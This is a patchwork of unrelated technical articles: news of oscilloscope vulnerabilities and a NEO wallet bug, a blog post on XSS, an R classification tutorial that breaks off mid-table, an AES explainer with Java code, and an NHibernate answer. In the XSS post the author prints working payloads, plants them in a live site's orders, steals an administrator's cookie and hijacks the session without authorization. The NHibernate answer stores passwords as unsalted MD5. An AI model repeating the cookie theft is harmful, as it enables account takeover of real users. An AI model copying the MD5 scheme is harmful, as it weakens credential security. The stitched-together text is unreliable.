It's nearly 2019, and your network can get pwned through an oscilloscope


Administrators overseeing lab environments would be well advised to double-check their network setups following the disclosure of serious flaws in a line of oscilloscopes.

On Friday, SEC Consult said it had uncovered a set of high-impact vulnerabilities in electronic testing equipment made by Siglent Technologies.

In particular, the bug-hunters examined the Siglent SDS 1202X-E Digital line of Ethernet-enabled oscilloscopes and found the boxes were lacking even basic security protections.

Among the flaws found by researchers was the use of completely unauthenticated and unguarded TCP connections between the oscilloscopes and any device on the network, typically via the EasyScopeX software, and the use of unencrypted communications between the scope and other systems on the network.

"Two backdoor accounts are present on the system," the researchers explained. "A Telnet service is listening on port 23 which enables an attacker to connect as root to the oscilloscope via LAN."

As a result, anyone who had local network access would be able to get onto the device and tamper with it.

Siglent did not respond to a request for comment on the matter.

Chalk this up as yet another example of the dangers brought on by the growing market for connected internet-of-things devices.



Normally, an oscilloscope would be the last thing an admin would have to worry about, however as new connectivity is bolted onto devices that traditionally operated in isolation, it is inevitable that some otherwise basic security measures will be overlooked.

Aside from the obvious danger of allowing an attacker to use the compromised devices as a starting point for attacks on other network devices, SEC Consult noted that someone could also use the vulnerabilities to tamper with the oscilloscope's own readings, offering a handy route for sabotage.

"Any malicious modification of measurement values may have serious impact on the product or service which is created or offered by using this oscilloscope," SEC Consult said of the flaw. "Therefore, all procedures which are executed with this device are untrustworthy."

That point is particularly noteworthy as observers have noted a marked increase in industrial espionage and IP theft attacks in recent years. It is not beyond the realm of possibility that a company wanting to hamper the progress of a rival, or a state-sponsored group that wanted to disrupt R&D, would look to mess with engineering equipment of a targeted facility.



Using an XSS Vulnerability to Easily Grab a Logged-in User's Cookie

Preface

I was recently browsing mini-programs and found one that, after requesting the user's information, automatically registers an account on a certain website.

So I went to take a look at the site. WOW! Lots of input boxes, so I tried XSS on the spot.

Finding the XSS vulnerability

In the spirit of learning and exchange, with trembling fingers I typed the following into the username field:

<script>alert(1)</script>

Hmm... nothing happened. A wave of disappointment: the expected alert box did not pop up. I sighed.

But a programmer can't give up that easily.

So I found some XSS variants to test:

</textarea><img onerror="alert(1)" src='1'>

WOW! Brilliant!
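An added example (not from the original post) showing why the first payload stayed silent while the second fired, and how encoding the value for its HTML context closes the hole. The assumed form markup renders the stored username inside a textarea, which is what the second payload's leading </textarea> suggests.

```python
"""Inside a <textarea>, "<script>" is inert text; "</textarea>" closes the
element first, so the <img onerror> that follows is parsed as live markup.
Escaping the value for its HTML context removes the difference.  Added
example; the surrounding form markup is assumed, the payloads are the post's."""
import html
import re

# The two payloads from the post, verbatim.
PAYLOAD_SCRIPT = "<script>alert(1)</script>"
PAYLOAD_BREAKOUT = "</textarea><img onerror=\"alert(1)\" src='1'>"


def render_unsafe(username):
    """Vulnerable: the stored username is concatenated into the form as-is."""
    return f'<textarea name="username">{username}</textarea>'


def render_safe(username):
    """Fixed: encode <, >, &, quotes before the value enters the HTML."""
    return f'<textarea name="username">{html.escape(username, quote=True)}</textarea>'


def textarea_breakout(page):
    """True if user data managed to close the textarea, i.e. the browser would
    see a second </textarea> and parse whatever follows as markup."""
    return len(re.findall(r"</textarea\s*>", page, re.IGNORECASE)) > 1


def report(username):
    """Summarise how each rendering treats one stored username."""
    return {
        "unsafe_breakout": textarea_breakout(render_unsafe(username)),
        "safe_breakout": textarea_breakout(render_safe(username)),
        "safe_html": render_safe(username),
    }


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_BREAKOUT):
        print(payload, "->", report(payload))
```

The same escaping applies wherever the username is shown again, such as an order list in the admin back end, which is where the post's payload actually fired.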

Exploiting the XSS further

At the time I thought: the mini-program has a top-up feature.

The administrator or finance staff will surely look now and then at today's purchases and at which new users have topped up.

So why not...

Make a couple of top-up orders, plant XSS in the username, and wait for the fish to bite.

I found a few HTTPS XSS platforms via a search engine and ticked the module that collects cookies:

Two years later... (or rather, the next day)

The fish bit: I got the username and cookie. So: set up a proxy, open the developer tools, Application, edit the cookies, refresh the page. Really lucky.

First time using XSS to actually do something; it felt great.

Unfortunately the admin back end and the user centre are shared, and I found no file-upload or other place for further exploitation.

I could only top up a small amount or so.

Vulnerability report

Reported to the relevant administrators for remediation.

Closing words

Developers: you must have security awareness!

This article was created by SangSir and is licensed under the Creative Commons Attribution 4.0 International licence.

Unless marked as reposted or attributed to another source, the articles on this site are original or translated by this site; please credit the author when reposting.

A Bug in NEO’s Blockchain Allows Hackers to Steal Remotely says China’s Tencen ...


China's Tencent Security Lab has warned the NEO community about a bug which allows hackers to steal tokens from user wallets remotely.

China's tech giant Tencent has informed the NEO developers and node operators about a bug which could potentially allow hackers to steal tokens remotely. According to Tencent's security lab, when a user starts a network node with the default configuration they are at risk of losing their funds.

Tencent's security arm published a post on the Chinese social media platform Weibo alerting users to the critical bug. The firm warns all node maintainers and ant coin (GAS) holders to pay attention to wallet security and update the client version in time.

The security arm has published three steps to avoid such attacks:



1. Upgrade to the latest NEO-CLI client;
2. Try not to use the RPC function, and manually change the "BindAddress" to "127.0.0.1";
3. If RPC must be called out of necessity, try changing the RPC port number, using the HTTPS-based JSON-RPC port, or putting up a firewall.

NEO is currently priced at $8.15 with a market cap of $529 Million. Recently Binance, one of the world’s largest exchange rated NEO with a gold label along with other projects like Tron, Verge, and Nano.



NYC buses: C5.0 classification with R; more than 20 minute delay?


(This article was first published on R Programming DataScience+ , and kindly contributed toR-bloggers)


We are continuing on with our NYC bus breakdown problem. When we left off, we had constructed a rule-based Cubist regression model with our expanded pool of predictors; but we were still only managing to explain 37% of the data's variance with our model. Given how 'dirty' the target variable 'time_delayed' is (because it is human reported and of dubious precision), we decided that perhaps we should rephrase the question in order to get a more sensible answer. When a bus breakdown is called into operations, perhaps the question to ask is: "Will this delay exceed twenty minutes?"

Classification: more than 20 minutes?

We could choose some other time, but for simplicity, twenty minutes is probably the breaking point of human patience, be they passengers or providers. This division also breaks the dataset approximately in half, so we don't have to deal with imbalance. As a side note, I have also run the problem for a thirty minute or more delay, breaking the data into and ; and the solution only improves.

We begin by setting up the data that we need, and the caret control objects:

# packages used in this post: readr/dplyr for the data, caret for training,
# caTools for colAUC, corrr and forcats for the correlation table
library(readr)
library(dplyr)
library(caret)
library(caTools)
library(corrr)
library(forcats)

in_csv <- "../output/intermediate/ii_times.csv"
ii_times <- read_csv(in_csv) %>%
  filter(reported_before_resolved == 1) %>%
  select(-reported_before_resolved) %>%
  mutate(
    time_delayed = cut(time_delayed, breaks = c(0, 22, 10000), labels = FALSE)
  ) %>%
  mutate(time_delayed = factor(time_delayed, labels = c("t0.22", "t22.")))

halfFold <- createFolds(ii_times$Busbreakdown_ID, k = 5, list = TRUE)
ii_small <- ii_times[halfFold[[2]], ]
ii_test  <- ii_times[halfFold[[3]], ]
ii_train <- ii_times %>% anti_join(ii_test, by = "Busbreakdown_ID")

rctrl_manual <- trainControl(method = "none", returnResamp = "all",
                             classProbs = TRUE, summaryFunction = twoClassSummary)
rctrl_repcv  <- trainControl(method = "repeatedcv", number = 2, repeats = 5,
                             returnResamp = "all", classProbs = TRUE,
                             summaryFunction = twoClassSummary)

Then we can use cross-fold validation on a reduced data set to quickly get a sense of which parameters we should use. Note that we deliberately choose 'rules', not 'tree' here, because we want a human-readable set of if/then conditions. Unfortunately, we will end up using 15 trials, which means our rule set is large. I have commented its output here, but it can be read this way, or with 'summary(model)'.

#---cubist
c50_grd <- expand.grid(.winnow = FALSE, .trials = c(15, 30, 50), .model = "rules")
set.seed(849)
c50_cv <- train(time_delayed ~ . -Busbreakdown_ID, data = ii_small,
                method = "C5.0", metric = "ROC", na.action = na.pass,
                trControl = rctrl_repcv, tuneGrid = c50_grd)
c50_cv

## C5.0
##
## 40665 samples
##    46 predictor
##     2 classes: 't0.22', 't22.'
##
## No pre-processing
## Resampling: Cross-Validated (2 fold, repeated 5 times)
## Summary of sample sizes: 20332, 20333, 20332, 20333, 20332, 20333, ...
## Resampling results across tuning parameters:
##
##   trials  ROC        Sens       Spec
##   15      0.8261069  0.8028816  0.6830990
##   30      0.8258429  0.8030490  0.6855583
##   50      0.8258429  0.8030490  0.6855583
##
## Tuning parameter 'model' was held constant at a value of rules
##
## Tuning parameter 'winnow' was held constant at a value of FALSE
## ROC was used to select the optimal model using the largest value.
## The final values used for the model were trials = 15, model = rules
##  and winnow = FALSE.

#writeLines(c50_cv$finalModel$rules)
#We can output the rule set as a block of text like this, but we have suppressed
#this output because with 50 trials, it is a very, very long list.

The system is relatively insensitive to the number of trials, so we can use 15. We run on our training and test sets to derive our true test ROC, and have a look at how our predicted probabilities correlate with the predictors, compared to the actual values.

c50_grd <- expand.grid(.winnow = FALSE, .trials = 15, .model = "rules")
c50_man <- train(time_delayed ~ . -Busbreakdown_ID, data = ii_train,
                 method = "C5.0", metric = "ROC", na.action = na.pass,
                 trControl = rctrl_manual, tuneGrid = c50_grd)
predictions <- predict(c50_man, newdata = ii_test, type = "prob")
ii_withpred <- ii_test %>% cbind(predictions %>% tbl_df())
colAUC(ii_withpred[["t0.22"]], (ii_withpred[["time_delayed"]] == "t0.22") * 1L,
       plotROC = TRUE)

##              [,1]
## 0 vs. 1 0.8486122

[Figure: ROC curve from colAUC]

#cubist: 0.847
corrr_analysis <- ii_withpred %>%
  select(-Busbreakdown_ID, -t0.22, -t22.) %>%
  mutate(time_delayed = (time_delayed == "t22.") * 1L) %>%
  correlate() %>%
  focus(time_delayed) %>%
  rename(feature = rowname) %>%
  arrange(desc(abs(time_delayed))) %>%
  mutate(feature = as_factor(feature))
corrr_analysis %>% print(n = 61)

## # A tibble: 45 x 2
##    feature                         time_delayed
##    <fct>                                  <dbl>
##  1 vehicle_total_with_attendants         0.176
##  2 Has_Contractor_Notified_Parents       0.171
##  3 Boro_Bronx                           -0.165
##  4 drivers_total_attendant               0.163
##  5 vehicle_total_max_riders             -0.162
##  6 vehicle_total_reg_seats              -0.160
##  7 Boro_Manhattan                        0.151
##  8 service_type_d2d                      0.149
##  9 Number_Of_Students_On_The_Bus        -0.149
## 10 Boro_StatenIsland                    -0.140
## 11 vehicle_total_ambulatory_seats       -0.0972
## 12 rush_min_from_peak                    0.0954
## 13 drivers_staff_servSchool              0.0792
## 14 Reason_MechanicalProblem              0.0729
## 15 Reason_HeavyTraffic                  -0.0698
## 16 Boro_Queens                           0.0667
## 17 vehicle_total_with_lifts              0.0654
## 18 rush_within                          -0.0612
## 19 time_am                              -0.0545
## 20 rush_between                          0.0538
## 21 Reason_DelayedbySchool               -0.0471
## 22 Reason_FlatTire                       0.0461
## 23 Have_You_Alerted_OPT                 -0.0457
## 24 Reason_Accident                       0.0427
## 25 Boro_Brooklyn                         0.0421
## 26 School_Age                            0.0416
## 27 drivers_numServ_prek                 -0.0394
## 28 Boro_NassauCounty                     0.0389
## 29 drivers_numServ_school                0.0374
## 30 Reason_WontStart                      0.0371
## 31 Has_Contractor_Notified_Schools       0.0346
## 32 drivers_num_servPreK                 -0.0315
## 33 drivers_staff_servPreK               -0.0305
## 34 Reason_We

Implementing the AES Encryption Algorithm in Java


I recently brushed up on encryption algorithms and then implemented one in a programming language.

Introduction to AES

The Advanced Encryption Standard (AES) is the most common symmetric encryption algorithm (WeChat mini-program encrypted transport uses it). A symmetric algorithm uses the same key for encryption and decryption; the encryption flow is shown in the figure below:


[figure: AES encryption flow]

The role and meaning of each part is briefly described below:

Plaintext P

Data that has not been encrypted.

Key K

The password used to encrypt the plaintext. In a symmetric algorithm the encryption key and the decryption key are the same. The key is negotiated between sender and receiver, but it must not be transmitted directly over the network, or it will leak; usually the key is encrypted with an asymmetric algorithm and then sent to the other party, or agreed face to face. The key must never leak, otherwise an attacker can recover it and steal the data.

AES encryption function

Let the AES encryption function be E; then C = E(K, P), where P is the plaintext, K the key and C the ciphertext. That is, the plaintext P and the key K are the inputs of the encryption function E, and E outputs the ciphertext C.

Ciphertext C

Data produced by the encryption function.

AES decryption function

Let the AES decryption function be D; then P = D(K, C), where C is the ciphertext, K the key and P the plaintext. That is, the ciphertext C and the key K are the inputs of the decryption function, and it outputs the plaintext P.

A brief explanation of symmetric and asymmetric encryption algorithms:

Symmetric encryption algorithms

The same key is used for encryption and decryption. This kind of encryption is very fast and suits scenarios where data is sent frequently. The drawback is that transporting the key is troublesome.

Asymmetric encryption algorithms

Different keys are used for encryption and decryption. These schemes are built from mathematical theorems or formulas, so encryption and decryption are usually slow, which suits scenarios where data is sent only occasionally. The advantage is that key transport is convenient. Common asymmetric algorithms are RSA, ECC and ElGamal.

In practice, the AES key is usually encrypted with RSA and transmitted to the receiver, who decrypts it to obtain the AES key.

Basic structure of AES

AES is a block cipher: the plaintext is divided into blocks of equal length, and one block is encrypted at a time until all blocks are done. In the AES standard the block length is fixed at 128 bits, that is, 16 bytes per block. The key length can be 128, 192 or 256 bits, and the recommended number of rounds differs with the key length, as the table shows:

AES      Key length (32-bit words)   Block length (32-bit words)   Rounds
AES-128  4                           4                             10
AES-192  6                           4                             12
AES-256  8                           4                             14

As stated above, the AES encryption formula is C = E(K, P). Inside the encryption function E a round function is executed n times (n being the number of rounds); the first n-1 executions perform the same operations, and only the n-th differs.

AES works on bytes. The 128-bit plaintext block P and the input key K are each divided into 16 bytes, written $P = P_0,P_1,...,P_{15}$ and $K = K_0,K_1,...,K_{15}$. For example, with plaintext block P=abcdefghijklmnop, the character a corresponds to $P_0$ and p to $P_{15}$. In general the plaintext block is described as a square matrix of bytes, called the state matrix. In each round of the algorithm the contents of the state matrix change, and the final result is output as the ciphertext. Bytes are placed in the matrix top to bottom, then left to right, as shown below:


[figure: byte layout of the state matrix]

Now suppose the plaintext block is P=abcdefghijklmnop; the state matrix built as above is:


[figure: state matrix for P=abcdefghijklmnop]

In the figure, 0x61 is the hexadecimal representation of the character a. As can be seen, after AES encryption the plaintext is unrecognizable.

Similarly, the 128-bit key is represented as a matrix of bytes, and each column of the matrix is called a 32-bit word. The key schedule function expands this key matrix into a sequence of 44 words W[0], W[1], ..., W[43]. The first 4 elements W[0], W[1], W[2], W[3] are the original key, used as the initial key in encryption. The remaining 40 words are divided into 10 groups of 4 words (128 bits each), used for the AddRoundKey step of the 10 encryption rounds, as shown below:
[figure: key expansion into the words W[0..43]]
In the figure, with K=abcdefghijklmnop, $K_0=a$, $K_{15}=p$ and $W[0]=K_0K_1K_2K_3=abcd$. The overall structure of AES is shown below, where W[0,3] denotes the 128-bit key formed by concatenating W[0], W[1], W[2] and W[3]. Rounds 1 to 9 of encryption use the same round function, consisting of four operations: SubBytes, ShiftRows, MixColumns and AddRoundKey. The last round omits MixColumns. In addition, before the first round the plaintext is XORed once with the original key.
[figure: overall AES encryption and decryption structure]

The figure also shows the AES decryption process: again 10 rounds, each the inverse of the corresponding encryption operations. Since all four round operations are invertible, each decryption round performs InvShiftRows, InvSubBytes, AddRoundKey and InvMixColumns in that order. As in encryption, the last round omits InvMixColumns, and one AddRoundKey is performed before decryption round 1.

The four operation stages of one AES round are described below; together they thoroughly confuse the input bits.

SubBytes

1. The SubBytes transformation

SubBytes in AES is simply a table lookup. AES defines an S-box and an inverse S-box.

The AES S-box:


[figure: the AES S-box]

The high 4 bits of the byte are used as the row index and the low 4 bits as the column index, and the element at that position of the S-box (or inverse S-box) is the output. For example, during encryption, if the byte S1 is 0x12, look up row 0x01, column 0x02 of the S-box to obtain 0xc9, then replace the original 0x12 in S1 with 0xc9. The state matrix after SubBytes is shown below:


[figure: state matrix after SubBytes]

2. The inverse SubBytes transformation

InvSubBytes is the same lookup performed with the inverse S-box, shown below:


[figure: the AES inverse S-box]

ShiftRows

1. The ShiftRows transformation

ShiftRows is a simple cyclic left shift. When the key length is 128 bits, row 0 of the state matrix is shifted left by 0 bytes, row 1 by 1 byte, row 2 by 2 bytes and row 3 by 3 bytes, as shown below:


[figure: ShiftRows]

2. The inverse ShiftRows transformation

The inverse of ShiftRows shifts each row of the state matrix the opposite way; in AES-128, row 0 is shifted right by 0 bytes, row 1 by 1 byte, row 2 by 2 bytes and row 3 by 3 bytes.

MixColumns

1. The MixColumns operation

MixColumns is implemented as a matrix multiplication: the state matrix produced by ShiftRows is multiplied by a fixed matrix, giving the mixed state matrix, as in the formula below:


[figure: the MixColumns matrix multiplication]

The MixColumns of column j (0 ≤ j ≤ 3) of the state matrix can be written as follows, where multiplication by 2 and 3 is carried out in GF(2^8) and ⊕ is bytewise XOR:

$$
\begin{aligned}
S'_{0,j} &= (2 S_{0,j}) \oplus (3 S_{1,j}) \oplus S_{2,j} \oplus S_{3,j} \\
S'_{1,j} &= S_{0,j} \oplus (2 S_{1,j}) \oplus (3 S_{2,j}) \oplus S_{3,j} \\
S'_{2,j} &= S_{0,j} \oplus S_{1,j} \oplus (2 S_{2,j}) \oplus (3 S_{3,j}) \\
S'_{3,j} &= (3 S_{0,j}) \oplus S_{1,j} \oplus S_{2,j} \oplus (2 S_{3,j})
\end{aligned}
$$

2. The inverse MixColumns operation

InvMixColumns is defined by the matrix multiplication shown below:


[figure: the InvMixColumns matrix multiplication]

It can be verified that the product of the inverse matrix and the forward matrix is exactly the identity matrix.

AddRoundKey

AddRoundKey XORs the 128-bit round key $K_i$ bit by bit with the data in the state matrix, as shown below. Each word W[4i], W[4i+1], W[4i+2], W[4i+3] of the round key $K_i$ is a 32-bit word of 4 bytes; how they are generated is described below. AddRoundKey can be seen as a word-wise XOR, or equally as a byte-level or bit-level operation: the 32-bit word formed by S0 S1 S2 S3 is XORed with W[4i].
[figure: AddRoundKey]

The inverse of AddRoundKey is identical to the forward operation, because XOR is its own inverse. AddRoundKey is very simple, yet it affects every bit of the state array S.

Key expansion
[figure: the 4x4 key matrix and the words W[0..3]]
The 4 bytes of each column of this 4x4 matrix form one word; the 4 words of the 4 columns are named W[0], W[1], W[2] and W[3] in turn, and they make up a word array W. For example, with key K=abcdefghijklmnop, $K_0 = a, K_1 = b, K_2 = c, K_3 = d$ and W[0] = abcd.

Next, the array W is extended by 40 new columns, giving an expanded key array of 44 columns in total. The new columns are produced by the following recursion:

W[i] = W[i-4] ⊕ W[i-1]       if i is not a multiple of 4
W[i] = W[i-4] ⊕ T(W[i-1])    if i is a multiple of 4

The function T consists of three parts: word rotation, byte substitution and round-constant XOR, which do the following:

Word rotation: cyclically shift the 4 bytes of the word left by one byte, so the input word [b0, b1, b2, b3] becomes [b1, b2, b3, b0]
Byte substitution: apply the S-box to the result of the word rotation
Round-constant XOR: XOR the result of the previous two steps with the round constant Rcon[j], where j is the round number
The round constant Rcon[j] is a word; its values are listed below:

j        1            2            3            4            5
Rcon[j]  01 00 00 00  02 00 00 00  04 00 00 00  08 00 00 00  10 00 00 00
j        6            7            8            9            10
Rcon[j]  20 00 00 00  40 00 00 00  80 00 00 00  1B 00 00 00  36 00 00 00

For example, let the initial 128-bit key be 3C A1 0B 21 57 F0 19 16 90 2E 13 80 AC C1 07 BD. The four initial words are:

W[0] = 3C A1 0B 21
W[1] = 57 F0 19 16
W[2] = 90 2E 13 80
W[3] = AC C1 07 BD

Now compute the first expanded round subkey (W[4], W[5], W[6], W[7]). Since 4 is a multiple of 4, W[4] = W[0] ⊕ T(W[3]), and T(W[3]) is computed as follows:

Rotate the bytes of W[3]: AC C1 07 BD becomes C1 07 BD AC
Feed C1 07 BD AC through the S-box; the output is 78 C5 7A 91
XOR 78 C5 7A 91 with the first round constant Rcon[1], giving 79 C5 7A 91; hence T(W[3]) = 79 C5 7A 91

Therefore W[4] = 3C A1 0B 21 ⊕ 79 C5 7A 91 = 45 64 71 B0

The other three words of the subkey are computed as:

W[5] = W[1] ⊕ W[4] = 57 F0 19 16 ⊕ 45 64 71 B0 = 12 94 68 A6
W[6] = W[2] ⊕ W[5] = 90 2E 13 80 ⊕ 12 94 68 A6 = 82 BA 7B 26
W[7] = W[3] ⊕ W[6] = AC C1 07 BD ⊕ 82 BA 7B 26 = 2E 7B 7C 9B

So the round-1 key is 45 64 71 B0 12 94 68 A6 82 BA 7B 26 2E 7B 7C 9B
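The S-box lookup, the MixColumns equations and the key schedule described above, as one added Python example that is not the article's own code: the S-box is derived from its GF(2^8) definition instead of being typed in, and the key expansion is checked against the article's worked key 3C A1 0B 21 ... (the function and constant names are this example's own).

```python
# Added example (not the article's code): S-box, MixColumns and AES-128 key schedule.
def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r

def make_sbox():
    """S[x] = affine map of the inverse of x in GF(2^8), with inv(0) = 0."""
    inv = {0: 0}
    for x in range(1, 256):
        inv[x] = next(y for y in range(1, 256) if gf_mul(x, y) == 1)
    box = []
    for x in range(256):
        b, s = inv[x], 0x63
        for k in range(5):  # b ^ rotl(b,1) ^ rotl(b,2) ^ rotl(b,3) ^ rotl(b,4)
            s ^= ((b << k) | (b >> (8 - k))) & 0xFF
        box.append(s)
    return box

SBOX = make_sbox()
MIX = [[2, 3, 1, 1], [1, 2, 3, 1], [1, 1, 2, 3], [3, 1, 1, 2]]
INV_MIX = [[14, 11, 13, 9], [9, 14, 11, 13], [13, 9, 14, 11], [11, 13, 9, 14]]
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]

def mix_column(col, matrix=MIX):
    """The four S'_{i,j} equations for one column; pass INV_MIX for the inverse."""
    return [gf_mul(m[0], col[0]) ^ gf_mul(m[1], col[1])
            ^ gf_mul(m[2], col[2]) ^ gf_mul(m[3], col[3]) for m in matrix]

def t_function(word, j):
    """T(W): rotate the word, substitute through the S-box, XOR with Rcon[j]."""
    w = [SBOX[b] for b in word[1:] + word[:1]]
    w[0] ^= RCON[j - 1]  # Rcon[j] is (rc, 00, 00, 00), so only byte 0 changes
    return w

def expand_key(key):
    """W[0..43]: W[i] = W[i-4] ^ W[i-1], using T(W[i-1]) when i % 4 == 0."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    for i in range(4, 44):
        prev = t_function(w[i - 1], i // 4) if i % 4 == 0 else w[i - 1]
        w.append([a ^ b for a, b in zip(w[i - 4], prev)])
    return w

KEY = bytes.fromhex("3CA10B2157F01916902E1380ACC107BD")  # the article's example key
```

expand_key(KEY)[4:8] reproduces the round-1 key worked out above, and mix_column followed by mix_column(..., INV_MIX) returns the original column, which is the identity-matrix property stated in the MixColumns section.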

Implementing AES in Java

Java ships with built-in AES support, so it can be called directly.

First generate the key, which is an object of type SecretKey:

import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

static final String ALGORITHM = "AES";

public static SecretKey generateKey() throws NoSuchAlgorithmException {
    // generate the key
    KeyGenerator secretGenerator = KeyGenerator.getInstance(ALGORITHM);
    SecureRandom secureRandom = new SecureRandom();
    secretGenerator.init(secureRandom); // provider's default AES key size
    return secretGenerator.generateKey();
}

Comparison of byte arrays with NHibernate


The following Linq to NHibernate query results in a System.NotSupportedException .

IEnumerable<File> FindByMd5(byte[] md5)
{
    return this.Session.Query<File>().Where(f => f.Md5.SequenceEqual(md5)).ToList();
}

How should I do this using Linq to NHibernate or QueryOver<File>() ?

Since the error already indicates that NHibernate does not support that feature, I would create a named query and solve the equation within a query. I have tested it with mysql (using a common username and password comparison as example) and the following statement returns the desired row (password is a BINARY(32) field):

SELECT * FROM `user` WHERE `password` = MD5('test');

Using mssql you can do:

SELECT * FROM [user] WHERE [password] = HASHBYTES('MD5', 'test')

So to extend this to a named query you would create an .hbm.xml file like 'User.hbm.xml' with the following content:

<?xml version="1.0" encoding="utf-8" ?>
<hibernate-mapping xmlns="urn:nhibernate-mapping-2.2" assembly="My.Model" namespace="My.Model">
  <sql-query name="GetUserByCredentials">
    <return class="My.Model.User, My.Model" />
    <![CDATA[
      SELECT * FROM User WHERE Username = :Username AND Password = MD5(:Password)
    ]]>
  </sql-query>
</hibernate-mapping>

To configure this I used Fluent NHibernate but something similar would be possible with just plain NHibernate:

Fluently.Configure()
    .Database(MySqlConfiguration.Standard
        .ConnectionString(x => x.FromConnectionStringWithKey("Test"))
        .AdoNetBatchSize(50))
    .Cache(c => c
        .UseQueryCache()
        .ProviderClass<HashtableCacheProvider>())
    .Mappings(m =>
    {
        m.FluentMappings.AddFromAssemblyOf<IHaveFluentNHibernateMappings>().Conventions.Add(ForeignKey.EndsWith("Id"));
        m.HbmMappings.AddFromAssemblyOf<IHaveFluentNHibernateMappings>();
    })
    .BuildConfiguration();

This statement looks for the ".hbm.xml" files in the assembly with the interface named "IHaveFluentNHibernateMappings"

With this in place you can do the following at session level:

public User GetUserByCredentials(string username, string password)
{
    IQuery query = Session.GetNamedQuery("GetUserByCredentials");
    query.SetParameter("Username", username);
    query.SetParameter("Password", password);
    return query.UniqueResult<User>();
}

And by calling the GetUserByCredentials method, the custom query will be executed.

As you can see password is a string, so you need to convert your MD5 byte array to a string first by using:

System.Text.StringBuilder s = new System.Text.StringBuilder();
foreach (byte b in md5ByteArray)
{
    s.Append(b.ToString("x2").ToLower());
}
password = s.ToString();

Good luck!
